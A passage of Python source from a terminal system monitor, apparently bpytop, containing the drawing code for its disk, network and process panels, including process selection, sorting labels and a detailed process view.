out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
if big_disk:
out += Fx.trans(f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(str(item["used_percent"])) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["used_percent"]}%')
cy += 1
if io_item:
if cy > h - 1: break
if CONFIG.io_graph_combined:
if cls.disks_io_h <= 1:
out += f'{Mv.to(y+cy, x+cx-1)}{" " * 5}'
out += (f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{Graphs.disk_io[name]["rw"](None if cls.redraw else mem.disks_io_dict[name]["rw"][-1])}'
f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{item["io"] or "RW"}')
cy += cls.disks_io_h
else:
if cls.disks_io_h <= 3:
out += f'{Mv.to(y+cy, x+cx-1)}{" " * 5}{Mv.to(y+cy+1, x+cx-1)}{" " * 5}'
out += (f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{Graphs.disk_io[name]["read"](None if cls.redraw else mem.disks_io_dict[name]["read"][-1])}'
f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{item["io_r"] or "R"}')
cy += cls.disks_io_h // 2
out += f'{Mv.to(y+cy, x+cx-1)}{Graphs.disk_io[name]["write"](None if cls.redraw else mem.disks_io_dict[name]["write"][-1])}'
cy += cls.disks_io_h // 2
out += f'{Mv.to(y+cy-1, x+cx-1)}{THEME.main_fg}{item["io_w"] or "W"}'
else:
for name, item in mem.disks.items():
if Collector.collect_interrupt: return
if not name in Meters.disks_used:
continue
if cy > h - 1: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
if big_disk:
out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{Fx.trans(item["io"])}'
cy += 1
if cy > h - 1: break
if CONFIG.show_io_stat and name in Graphs.disk_io:
out += f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{Fx.ub}{" IO: " if big_disk else " IO " + Mv.l(2)}{Fx.ub}{Graphs.disk_io[name]["rw"](None if cls.redraw else mem.disks_io_dict[name]["rw"][-1])}'
if not big_disk and item["io"]:
out += f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{THEME.main_fg}{item["io"]}'
cy += 1
if cy > h - 1: break
out += Mv.to(y+cy, x+cx) + (f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U ")
out += f'{Meters.disks_used[name](None if cls.resized else mem.disks[name]["used_percent"])}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 3 + (len(mem.disks_io_dict) if CONFIG.show_io_stat else 0) <= h + 1:
if cy > h - 1: break
out += Mv.to(y+cy, x+cx)
out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
out += f'{Meters.disks_free[name](None if cls.resized else mem.disks[name]["free_percent"])}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 4 + (len(mem.disks_io_dict) if CONFIG.show_io_stat else 0) <= h + 1: cy += 1
except (KeyError, TypeError):
return
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = False
class NetBox(Box, SubBox):
name = "net"
num = 3
height_p = 30
width_p = 45
min_w: int = 36
min_h: int = 6
x = 1
y = 1
resized: bool = True
redraw: bool = True
graph_height: Dict[str, int] = {}
symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
buffer: str = "net"
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "net" in cls.boxes:
cls.width = Term.width
return
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
cls.width = round(Term.width * width_p / 100)
cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
cls.y = Term.height - cls.height + 1
cls.box_width = 27 if cls.width > 45 else 19
cls.box_height = 9 if cls.height > 10 else cls.height - 2
cls.box_x = cls.width - cls.box_width - 1
cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
cls.graph_height["download"] = round((cls.height - 2) / 2)
cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
cls.redraw = True
@classmethod
def _draw_bg(cls) -> str:
if not "net" in cls.boxes: return ""
return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'
@classmethod
def _draw_fg(cls):
if not "net" in cls.boxes: return
net = NetCollector
if net.redraw: cls.redraw = True
if not net.nic: return
out: str = ""
out_misc: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
reset: bool = bool(net.stats[net.nic]["download"]["offset"])
if cls.resized or cls.redraw:
out_misc += cls._draw_bg()
if not "b" in Key.mouse:
Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 6:
if not "a" in Key.mouse: Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 13:
if not "y" in Key.mouse: Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if net.address and w - len(net.nic[:10]) - len(net.address) - 20 > 15:
out_misc += (f'{Mv.to(y-1, x+7)}{THEME.net_box(Symbol.title_left)}{Fx.b}{THEME.title(net.address)}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
Draw.buffer("net_misc", out_misc, only_save=True)
cy = 0
for direction in ["download", "upload"]:
strings = net.strings[net.nic][direction]
stats = net.stats[net.nic][direction]
if cls.redraw: stats["redraw"] = True
if stats["redraw"] or cls.resized:
Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"],
invert=direction != "download", color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None)
out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
cy += 1 if bh != 3 else 2
if bh >= 6:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
cy += 1
if bh >= 4:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
if bh > 2 and bh % 2: cy += 2
else: cy += 1
stats["redraw"] = False
out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = False
class ProcBox(Box):
name = "proc"
num = 4
height_p = 68
width_p = 55
min_w: int = 44
min_h: int = 16
x = 1
y = 1
current_y: int = 0
current_h: int = 0
select_max: int = 0
selected: int = 0
selected_pid: int = 0
last_selection: int = 0
filtering: bool = False
moved: bool = False
start: int = 1
count: int = 0
s_len: int = 0
detailed: bool = False
detailed_x: int = 0
detailed_y: int = 0
detailed_width: int = 0
detailed_height: int = 8
resized: bool = True
redraw: bool = True
buffer: str = "proc"
pid_counter: Dict[int, int] = {}
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "proc" in cls.boxes:
cls.width = Term.width
return
width_p: int; height_p: int
if not "net" in cls.boxes and not "mem" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
cls.x = Term.width - cls.width + 1
cls.y = Box._b_cpu_h + 1
cls.current_y = cls.y
cls.current_h = cls.height
cls.select_max = cls.height - 3
cls.redraw = True
cls.resized = True
@classmethod
def _draw_bg(cls) -> str:
if not "proc" in cls.boxes: return ""
return create_box(box=cls, line_color=THEME.proc_box)
@classmethod
def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
old: Tuple[int, int] = (cls.start, cls.selected)
new_sel: int
if key in ["up", "k"]:
if cls.selected == 1 and cls.start > 1:
cls.start -= 1
elif cls.selected == 1:
cls.selected = 0
elif cls.selected > 1:
cls.selected -= 1
elif key in ["down", "j"]:
if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
cls.selected = cls.last_selection
cls.last_selection = 0
if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 1
elif cls.selected < cls.select_max:
cls.selected += 1
elif key == "mouse_scroll_up" and cls.start > 1:
cls.start -= 5
elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 5
elif key == "page_up" and cls.start > 1:
cls.start -= cls.select_max
elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += cls.select_max
elif key == "home":
if cls.start > 1: cls.start = 1
elif cls.selected > 0: cls.selected = 0
elif key == "end":
if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.selected < cls.select_max: cls.selected = cls.select_max
elif key == "mouse_click":
if mouse_pos[0] > cls.x + cls.width - 4 and cls.current_y + 1 < mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
if mouse_pos[1] == cls.current_y + 2:
cls.start = 1
elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
cls.start = ProcCollector.num_procs - cls.select_max + 1
else:
cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2)))
else:
new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0
if new_sel > 0 and new_sel == cls.selected:
Key.list.insert(0, "enter")
return
elif new_sel > 0 and new_sel != cls.selected:
if cls.last_selection: cls.last_selection = 0
cls.selected = new_sel
elif key == "mouse_unselect":
cls.selected = 0
if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
if old != (cls.start, cls.selected):
cls.moved = True
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True)
@classmethod
def _draw_fg(cls):
if not "proc" in cls.boxes: return
proc = ProcCollector
if proc.proc_interrupt: return
if proc.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
n: int = 0
x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2
prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int
dgx: int; dgw: int; dx: int; dw: int; dy: int
l_count: int = 0
scroll_pos: int = 0
killed: bool = True
indent: str = ""
offset: int = 0
tr_show: bool = True
usr_show: bool = True
vals: List[str]
g_color: str = ""
s_len: int = 0
if proc.search_filter: s_len = len(proc.search_filter[:10])
loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}'
end: str = ""
if proc.detailed:
dgx, dgw = x, w // 3
dw = w - dgw - 1
if dw > 120:
dw = 120
dgw = w - 121
dx = x + dgw + 2
dy = cls.y + 1
if w > 67:
arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0)
prog_len = 15
else:
arg_len = 0
prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0)
if prog_len < 15:
tr_show = False
prog_len += 5
if prog_len < 12:
usr_show = False
prog_len += 9
if CONFIG.proc_tree:
tree_len = arg_len + prog_len + 6
arg_len = 0
#* Buttons and titles only redrawn if needed
if cls.resized or cls.redraw:
s_len += len(CONFIG.proc_sorting)
if cls.resized or s_len != cls.s_len or proc.detailed:
cls.s_len = s_len
for k in ["e", "r", "c", "T", "K", "I", "enter", "left", " ", "f", "delete"]:
if k in Key.mouse: del Key.mouse[k]
if proc.detailed:
killed = proc.details.get("killed", False)
main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg
hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg
title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg
if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented:
cls.current_y = cls.y + 8
cls.current_h = cls.height - 8
for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}'
out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}'
f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}')
for i in range(7):
out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}'
out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}'
f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if cls.selected == 0:
Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)]
if cls.selected == 0 and not killed:
Key.mouse["T"] = [[dx+2 + i, dy-1] for i in range(9)]
out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}T{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if dw > 28:
if cls.selected == 0 and not killed and not "K" in Key.mouse: Key.mouse["K"] = [[dx + 13 + i, dy-1] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}K{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if dw > 39:
if cls.selected == 0 and not killed and not "I" in Key.mouse: Key.mouse["I"] = [[dx + 19 + i, dy-1] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}I{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if Graphs.detailed_cpu is NotImplemented or cls.resized:
Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu)
Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem)
cls.select_max = cls.height - 11
y = cls.y + 9
h = cls.height - 10
else:
if cls.current_y != cls.y or cls.resized:
cls.current_y = cls.y
cls.current_h = cls.height
y, h = cls.y + 1, cls.height - 2
out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}')
cls.select_max = cls.height - 3
sort_pos = x + w - len(CONFIG.proc_sorting) - 7
if not "left" in Key.mouse:
Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)]
Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' +
("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") +
f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} '
f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 29 + s_len:
if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}'
f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 37 + s_len:
if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)]
out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}'
f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 47 + s_len:
if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)]
out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}'
f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+6 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))]
if proc.search_filter:
if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+12 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)]
elif "delete" in Key.mouse:
del Key.mouse["delete"]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("F" if cls.filtering and proc.case_sensitive else "f")}{THEME.title}' +
("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') +
f'{THEME.proc_box(Symbol.title_right)}')
main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg
hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg
title = THEME.inactive_fg if cls.selected == 0 else THEME.title
out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}'
f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}'
f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}')
if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)]
if w - len(loc_string) > 34:
if not "T" in Key.mouse: Key.mouse["T"] = [[x + 22 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}T{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 40:
if not "K" in Key.mouse: Key.mouse["K"] = [[x + 33 + i, y+h] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}K{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 51:
if not "I" in Key.mouse: Key.mouse["I"] = [[x + 39 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}I{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if CONFIG.proc_tree and w - len(loc_string) > 65:
if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
#* Processes labels
selected: str = CONFIG.proc_sorting
label: str
if selected == "memory": selected = "mem"
if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr"
if CONFIG.proc_tree:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected in ["pid", "program", "arguments"]: selected = "tree"
else:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") +
((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected == "program" and prog_len <= 8: selected = "prg"
selected = selected.split(" ")[0].capitalize()
if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB")
label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}')
out_misc += label
Draw.buffer("proc_misc", out_misc, only_save=True)
#* Detailed box draw
if proc.detailed:
if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b
elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = f'{THEME.inactive_fg}'
else: stat_color = ""
expand = proc.expand
iw = (dw - 3) // (4 + expand)
iw2 = iw - 1
out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}'
f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}')
for i, l in enumerate(["C", "P", "U"]):
out += f'{Mv.to(dy+2+i, dgx)}{l}'
for i, l in enumerate(["C", "M", "D"]):
out += f'{Mv.to(dy+4+i, dx+1)}{l}'
out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' +
(f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") +
(f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") +
(f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") +
(f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' +
(f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") +
(f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") +
(f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") +
(f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}'
f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} '
f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}')
cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5)
for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))):
out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}'
if i == 2: break
#* Checking for selection out of bounds
if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1
elif cls.start > proc.num_procs: cls.start = proc.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
#* Start iteration over all processes and info
cy = 1
for n, (pid, items) in enumerate(proc.processes.items(), start=1):
if n < cls.start: continue
l_count += 1
if l_count == cls.selected:
is_selected = True
cls.selected_pid = pid
else: is_selected = False
indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]]
if CONFIG.proc_tree:
arg_len = 0
offset = tree_len - len(f'{indent}{pid}')
if offset < 1: offset = 0
indent = f'{indent:.{tree_len - len(str(pid))}}'
if offset - len(name) > 12:
cmd = cmd.split(" ")[0].split("/")[-1]
if not cmd.startswith(name):
offset = len(name)
arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2
cmd = f'({cmd[:(arg_len-4)]})'
else:
offset = prog_len - 1
if cpu > 1.0 or pid in Graphs.pid_cpu:
if pid not in Graphs.pid_cpu:
Graphs.pid_cpu[pid] = Graph(5, 1, None, [0])
cls.pid_counter[pid] = 0
elif cpu < 1.0:
cls.pid_counter[pid] += 1
if cls.pid_counter[pid] > 10:
del cls.pid_counter[pid], Graphs.pid_cpu[pid]
else:
cls.pid_counter[pid] = 0
end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub
if cls.selected > cy: calc = cls.selected - cy
elif 0 < cls.selected <= cy: calc = cy - cls.selected
else: calc = cy
if CONFIG.proc_colors and not is_selected:
vals = []
for v in [int(cpu), int(mem), int(threads // 3)]:
if CONFIG.proc_gradient:
val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max
vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}']
else:
vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}']
c_color, m_color, t_color = vals
else:
c_color = m_color = t_color = Fx.b
if CONFIG.proc_gradient and not is_selected:
